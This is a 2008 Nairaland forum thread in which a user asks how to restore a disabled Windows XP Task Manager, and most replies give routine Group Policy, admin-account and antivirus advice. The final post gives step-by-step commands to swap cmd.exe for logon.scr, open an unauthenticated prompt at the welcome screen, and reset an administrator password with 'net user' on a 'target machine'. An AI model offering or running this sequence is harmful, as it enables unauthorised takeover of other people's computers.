Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,152,718 members, 7,816,963 topics. Date: Friday, 03 May 2024 at 09:24 PM

Help With My Task Manager: - Computers - Nairaland

Nairaland Forum / Science/Technology / Computers / Help With My Task Manager: (3618 Views)

I Need Help About Windows Task Manager / My Task Manager And Regedit Is Blocked I Need Help Mates! / Virus Disables Windows 'Run' Command, Task Manager (2) (3) (4)

(1) (Reply) (Go Down)

Help With My Task Manager: by oineoma(m): 5:54pm On May 20, 2008
Can anyone help, I have my laptop to someone and he somehow turned my task manager abi how dem de call am, Now i cant turn it back on, Can anyone help, U know, That thing that open when you do ctrl +alt+del, help,
Re: Help With My Task Manager: by SUNO1: 6:04pm On May 20, 2008
Have you tried right clicking on the "task bar" and clicking on "Task Manager."

Do you get an error when you hit the Ctrl + Alt + Del keys?

Are you logged on as Administrator?

What version of Windows are you using?

---------
SUNO
---------
Re: Help With My Task Manager: by oineoma(m): 6:13pm On May 20, 2008
Suno, I tried ctrl alt del, And it said de task manager has been disabled by the administrator, an using a p3, windos xp,
Re: Help With My Task Manager: by Nobody: 6:16pm On May 20, 2008
virus

google 'restore task manager'

to restore task manager. you also need to run a virus scan
Re: Help With My Task Manager: by SUNO1: 6:43pm On May 20, 2008
[b]You didn't tell me if you are an Administrator or not. You shouldn't have this problem if you are. But if you are and still get this problem, then it's probably disabled either by a virus or your friend messed with the registry. You can try doing this,

- Click "Start" > "Run."

- Type in "gpedit.msc" (without the quotes) into the command line and click "OK." (This will open the Group Policy settings window)

- Navigate to "User Configuration" > "Administrative Templates" > "System" > "Ctrl + Alt + Delete Options" > "Remove Task Manager."

- Double-click the "Remove Task Manager" option from the "Group Policy menu."

- Click the Disabled radio button. (This option, even though it says "Disable" is actually enabling the Task Manager.)

- Click Ok

Hopefully, you should be all right now. Good luck.

---------
SUNO
---------
[/b]
Re: Help With My Task Manager: by oineoma(m): 8:16pm On May 20, 2008
Slow down guys, Thanks for de tips, Should work, But who is an administrator?i see that option sometimes but never used it, And how do i rename my laptop, It was my sister's own and was registered to her name, I need to chang it to mine, Thanks Suno, How come i've never seen you around here befor, Thoug i hang out more in phone's, Save man,
Re: Help With My Task Manager: by TmeD0(m): 8:51pm On May 20, 2008
S.U.N.O:

[b]You didn't tell me if you are an Administrator or not. You shouldn't have this problem if you are. But if you are and still get this problem, then it's probably disabled either by a virus or your friend messed with the registry. You can try doing this,

- Click "Start" > "Run."

- Type in "gpedit.msc" (without the quotes) into the command line and click "OK." (This will open the Group Policy settings window)

- Navigate to "User Configuration" > "Administrative Templates" > "System" > "Ctrl + Alt + Delete Options" > "Remove Task Manager."

- Double-click the "Remove Task Manager" option from the "Group Policy menu."

- Click the Disabled radio button. (This option, even though it says "Disable" is actually enabling the Task Manager.)

- Click Ok

Hopefully, you should be all right now. Good luck.

---------
SUNO
---------
[/b]
Phew!  Glad you didn't have him mess with the registry key for that.  Thank God for group policy settings as an alternative.  @ poster, you might want to make yourself administrator on that machine or else you'll be wasting your time trying to change settings in group policy.  First thing you want to do is add yourself as an authorized user on the notebook ya paddy dash you.  By that I mean going into control panel, user accounts and create a new user with administrative priviledge.  On the other hand, if there's only one user account on the notebook aside from the built-in administrator account, you might want to give that user admin rights on your notebook.  What SUNO suggested is the solution to your problem--he's right either a virus disabled it or ya friend disabled it.  In this case, I think the former is the case. Why?  The error message you got make me believe your friend's account, which I presume is the same you're using now does not have admin priviledge on that machine.  On a side note, I'd suggest you get a free antivirus and antispyware and run a deep scan on your notebook prefarably in safe mode nna.  Good luck!  Peace!
Re: Help With My Task Manager: by uspry1(f): 9:25pm On May 20, 2008
Here is what Windows Administrator login look like:

In Normal mode:
[img width=400 height=300]http://www.petri.co.il/images/xp_welcome_screen.jpg[/img]

Select "ADMINISTRATOR" with prompted password
[img width=400 height=300]http://www.raymond.cc/images/xp_welcome_screen.gif[/img]

In Safe Mode:
[img width=400 height=300]http://www.pcsecuritysecrets.com/index/images/safemode_users_screen.gif[/img]

Create and customize user accounts for each person use your computer/laptop at below link:

http://www.microsoft.com/windowsxp/using/setup/winxp/accounts.mspx
Re: Help With My Task Manager: by SUNO1: 9:33pm On May 20, 2008
I didn't know if he was an Administrator or not. He never answered when I asked. But, my mistake, I assumed he was. .'cause he said he "[. .]gave his laptop to someone[. .]" But I guess I assumed wrong :smh:. Well, he can't really edit the registry without Administrator rights anyways. Thank God.

Oh and I just started posting today Oineoma.

---------
SUNO
---------
Re: Help With My Task Manager: by TmeD0(m): 9:41pm On May 20, 2008
S.U.N.O:

I didn't know if he was an Administrator or not. He never answered when I asked. But, my mistake, I assumed he was. .'cause he said he "[. .]gave his laptop to someone[. .]" But I guess I assumed wrong :smh:. Well, he can't really edit the registry without Administrator rights anyways. Thank God.

Oh and I just started posting today Oineoma.

---------
SUNO
---------

You do well o jare my guy!  No mind am wey hin no answer ya qweshun sef.  I doubt if the user account he's presently using has admin priviledge on the machine.  @ poster, you need to make sure you have admin priviledge before you can change the the group settings but I'd still suggest you run a scan on your PC in safe mode afterwards.  Peace!
Re: Help With My Task Manager: by Ralvy(m): 8:53pm On May 21, 2008
Just exported these out of my registry!
The attached registry scripts would work perfectly!!

Re: Help With My Task Manager: by ztyle(m): 8:56pm On May 21, 2008
Is this Ralph? shocked shocked
Re: Help With My Task Manager: by Ralvy(m): 7:47pm On May 22, 2008
NOOO!!! shocked It's not Ralph!!

It's [n3rve] cool

How do u know me? tongue cheesy
Re: Help With My Task Manager: by Dclique(m): 10:07am On May 23, 2008
Guy dnt fight it.ur system iz jst showing signs of nearby death.lol
Re: Help With My Task Manager: by Dclique(m): 10:08am On May 23, 2008
Guy dnt fight it.ur system iz jst showing signs of nearby death.lol
Re: Help With My Task Manager: by Ralvy(m): 11:43am On May 23, 2008
oineoma:

who is an administrator?i see that option sometimes but never used it, And how do i rename my laptop, It was my sister's own and was registered to her name, I need to chang it to mine.

ooops! I didn't read this Post!! ermmm . .   shocked
All my IPs have been Banned, Seun - This is no Hack! Please, don't IP Ban me undecided tongue

Try This:

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
on the welcome screen of a normal booted machine)

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called n3rve and you want the password "n3rve_hacker666" enter this
"net user n3rve n3rve_hacker666"
and this changes the password on n3rve's Machine. [Yo!! a_s_s can't try this on my MAC Book, infact don't  angry] tongue

Laters Mayne . . .

(1) (Reply)

Help! My Windows 10 System Is Consuming Too Much Data. / Configure Starcomms Usb Modem On Linux / I Need To Hide My Ip

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 29
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.